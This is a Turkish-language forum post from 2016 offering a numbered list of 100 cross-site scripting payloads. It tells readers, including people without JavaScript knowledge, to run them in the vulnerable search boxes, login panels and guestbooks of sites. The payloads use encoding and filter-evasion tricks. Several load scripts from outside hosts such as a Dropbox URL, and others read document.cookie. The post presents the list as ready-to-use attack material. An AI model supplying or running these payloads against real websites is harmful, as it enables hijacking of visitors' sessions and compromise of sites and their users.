12-03-2016, 01:00 PM
Cross Site Script(XSS) Açığı Bulunan Sitelerde Kullanabileceğiniz XSS Payloadlarını Sizlerle Paylaşıyorum. Özellikle JavaScript Programlama Dilini Bilmeyenlerin Çok Fayda Göreceği Kodlardır. Bir Sitede Cross Site Script(XSS) Açığı Varsa O Sitedeki İlgili Alanlarda Bu Kodları Çalıştırarak Çeşitli Sonuçlar Elde Edebilirsiniz. Bu Kodları Kendinize Göre Düzenleme Yapabilirsiniz Veya Olduğu Gibi Kullanabilirsiniz.
XSS Açığı Nerelerde Bulunur.
Web Site Arama Bölümlerinde
Üye Giriş Panellerinde
YÖnetici Giriş Panellerinde
Ziyaretçi Defterlerinde
vb. Yerlerde
XSS Açığı Nerelerde Bulunur.
Web Site Arama Bölümlerinde
Üye Giriş Panellerinde
YÖnetici Giriş Panellerinde
Ziyaretçi Defterlerinde
vb. Yerlerde
Code:
1) <iframe %00 src="	javascript:prompt(1)	"%00>
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <sVg><scRipt %00>alert(1) {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript:confirm(1)"
7) <img src=`%00`
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) "><h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form><a href="javascript:\u0061lert(1)">X
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
21) <img/
src=`~` onerror=prompt(1)>
22) <form><iframe
src="javascript:alert(1)"
;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
26) <img/src=@
onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style ><script :-(>/**/alert(document.location)/**/</script :-(
30) �</form><input type="date" onfocus="alert(1)">
31) <form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!-- > alert (1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40)
<blink/
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:
javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>DIV</div>
53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <img src=`xx:xx`onerror=alert(1)>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript:\u0061le%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=<!-->
alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//
confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:-)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=data:text/javascript,alert(1)></script>
94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript:alert(1)>CLICKME
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>